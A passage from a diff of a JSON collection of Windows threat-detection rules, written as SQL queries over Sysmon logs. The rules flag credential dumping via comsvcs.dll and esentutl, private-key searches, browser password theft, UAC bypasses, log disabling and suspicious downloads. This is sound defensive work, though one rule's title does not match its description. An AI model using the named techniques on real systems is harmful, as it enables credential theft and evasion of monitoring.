OriginalFileName = 'GPSCRIPT.EXE') AND (CommandLine LIKE '% /logon%' ESCAPE '\\' OR CommandLine LIKE '% /startup%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharp_chisel.yml" + "filename": "proc_creation_win_lolbin_gpscript.yml" }, { - "title": "Esentutl Gather Credentials", - "id": "7df1713a-1a5b-4a4b-a071-dc83b144a101", + "title": "Sdclt Child Processes", + "id": "da2738f2-fadb-4394-afa7-0a0674885afa", "status": "test", - "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", - "author": "sam0x90", + "description": "A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.003" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "To be determined" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%esentutl%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sdclt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_esentutl_params.yml" + "filename": "proc_creation_win_sdclt_child_process.yml" }, { - "title": "Wusa Extracting Cab Files", - "id": "59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9", + "title": "Process Reconnaissance Via Wmic.EXE", + "id": "221b251a-357a-49a9-920a-271802777cc0", "status": "experimental", - "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. This could indicate an attacker using an old technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of \"wmic\" with the \"process\" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.", + "author": "frack113", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "The \"extract\" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%process%' ESCAPE '\\') AND NOT (CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wusa_cab_files_extraction.yml" + "filename": "proc_creation_win_wmic_recon_process.yml" }, { - "title": "DLL Loaded via CertOC.EXE", - "id": "242301bc-f92f-4476-8718-78004a6efd9f", - "status": "experimental", - "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.", - "author": "Austin Songer @austinsonger", + "title": "Process Dumping Via Comsvcs.DLL", + "id": "646ea171-dded-4578-8a4d-65e9822892e3", + "status": "test", + "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", + "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1036", + "attack.t1003.001", + "car.2013-05-009" + ], + "falsepositives": [ + "Unlikely, because no one should dump the process memory in that way" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" + }, + { + "title": "Suspicious Whoami.EXE Execution", + "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", + "status": "experimental", + "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certoc_load_dll.yml" + "filename": "proc_creation_win_whoami_susp_flags.yml" }, { - "title": "Private Keys Reconnaissance Via CommandLine Tools", - "id": "213d6a77-3d55-4ce8-ba74-fcfef741974e", + "title": "Copy from Admin Share", + "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", "status": "test", - "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", - "author": "frack113", + "description": "Detects a suspicious copy command to or from an Admin share or remote", + "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.lateral_movement", + "attack.collection", + "attack.exfiltration", + "attack.t1039", + "attack.t1048", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Administrative scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%.key%' ESCAPE '\\' OR CommandLine LIKE '%.pgp%' ESCAPE '\\' OR CommandLine LIKE '%.gpg%' ESCAPE '\\' OR CommandLine LIKE '%.ppk%' ESCAPE '\\' OR CommandLine LIKE '%.p12%' ESCAPE '\\' OR CommandLine LIKE '%.pem%' ESCAPE '\\' OR CommandLine LIKE '%.pfx%' ESCAPE '\\' OR CommandLine LIKE '%.cer%' ESCAPE '\\' OR CommandLine LIKE '%.p7b%' ESCAPE '\\' OR CommandLine LIKE '%.asc%' ESCAPE '\\') AND (((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%dir %' ESCAPE '\\') OR (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Get-ChildItem %' ESCAPE '\\') OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((Image LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((Image LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_private_keys_recon.yml" + "filename": "proc_creation_win_susp_copy_lateral_movement.yml" }, { - "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", - "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", + "title": "Suspicious Double Extension File Execution", + "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", + "status": "stable", + "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", + "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%.doc.exe' ESCAPE '\\' OR Image LIKE '%.docx.exe' ESCAPE '\\' OR Image LIKE '%.xls.exe' ESCAPE '\\' OR Image LIKE '%.xlsx.exe' ESCAPE '\\' OR Image LIKE '%.ppt.exe' ESCAPE '\\' OR Image LIKE '%.pptx.exe' ESCAPE '\\' OR Image LIKE '%.rtf.exe' ESCAPE '\\' OR Image LIKE '%.pdf.exe' ESCAPE '\\' OR Image LIKE '%.txt.exe' ESCAPE '\\' OR Image LIKE '% .exe' ESCAPE '\\' OR Image LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR Image LIKE '%.doc.js' ESCAPE '\\' OR Image LIKE '%.docx.js' ESCAPE '\\' OR Image LIKE '%.xls.js' ESCAPE '\\' OR Image LIKE '%.xlsx.js' ESCAPE '\\' OR Image LIKE '%.ppt.js' ESCAPE '\\' OR Image LIKE '%.pptx.js' ESCAPE '\\' OR Image LIKE '%.rtf.js' ESCAPE '\\' OR Image LIKE '%.pdf.js' ESCAPE '\\' OR Image LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" + "filename": "proc_creation_win_susp_double_extension.yml" }, { - "title": "Potential Persistence Via Microsoft Compatibility Appraiser", - "id": "f548a603-c9f2-4c89-b511-b089f7e94549", + "title": "Service DACL Abuse To Hide Services Via Sc.EXE", + "id": "a537cfc3-4297-4789-92b5-345bfd845ad0", "status": "experimental", - "description": "Detects manual execution of the \"Microsoft Compatibility Appraiser\" task via schtasks.\nIn order to trigger persistence stored in the \"\\AppCompatFlags\\TelemetryController\" registry key.\n", - "author": "Sreeman", + "description": "Detects usage of the \"sc.exe\" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%run %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Application Experience\\\\Microsoft Compatibility Appraiser%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_persistence_windows_telemetry.yml" + "filename": "proc_creation_win_sc_sdset_hide_sevices.yml" }, { - "title": "PUA - WebBrowserPassView Execution", - "id": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", + "title": "Disable Windows IIS HTTP Logging", + "id": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", "status": "experimental", - "description": "Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera", + "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1555.003" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Web Browser Password Viewer' OR Image LIKE '%\\\\WebBrowserPassView.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:httplogging%' ESCAPE '\\' AND CommandLine LIKE '%dontLog:true%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_webbrowserpassview.yml" + "filename": "proc_creation_win_iis_appcmd_http_logging.yml" }, { - "title": "Renamed SysInternals DebugView Execution", - "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", - "status": "test", - "description": "Detects suspicious renamed SysInternals DebugView execution", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential CVE-2021-26857 Exploitation Attempt", + "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", + "status": "stable", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", + "author": "Bhabesh Raj", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.t1203", + "attack.execution", + "cve.2021.26857" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND Image LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((Image LIKE '%wermgr.exe' ESCAPE '\\' OR Image LIKE '%WerFault.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" + "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" }, { - "title": "PUA - Process Hacker / System Informer Execution", - "id": "811e0002-b13b-4a15-9d00-a613fce66e42", + "title": "Privilege Escalation via Named Pipe Impersonation", + "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", "status": "experimental", - "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", + "author": "Tim Rauch", + "tags": [ + "attack.lateral_movement", + "attack.t1021" + ], "falsepositives": [ - "Sometimes used by developers or system administrators for debugging purposes" + "Other programs that cause these patterns (please report)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (Image LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_process_hacker.yml" + "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" }, { - "title": "Potential DLL Injection Or Execution Using Tracker.exe", - "id": "148431ce-4b70-403d-8525-fcc2993f29ea", + "title": "Run PowerShell Script from Redirected Input Stream", + "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", "status": "test", - "description": "Detects potential DLL injection and execution using \"Tracker.exe\"", - "author": "Avneet Singh @v3t0_, oscd.community", + "description": "Detects PowerShell script execution via input stream redirect", + "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1055.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tracker.exe' ESCAPE '\\' OR Description = 'Tracker') AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ERRORREPORT:PROMPT %' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\amd64\\\\MSBuild.exe' ESCAPE '\\'))))" + "attack.execution", + "attack.t1059" ], - "filename": "proc_creation_win_lolbin_tracker.yml" - }, - { - "title": "Rundll32 Execution Without DLL File", - "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", - "status": "experimental", - "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", - "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" ], - "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" + "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Process", - "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "title": "File Download Via Bitsadmin To A Suspicious Target Folder", + "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_winsat.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" }, { - "title": "SQLite Firefox Profile Data DB Access", - "id": "4833155a-4053-4c9c-a997-777fcea0baa7", + "title": "Suspicious Download from Office Domain", + "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", - "author": "frack113", - "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.collection", - "attack.t1005" - ], + "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ - "Unknown" + "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wget.exe' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR 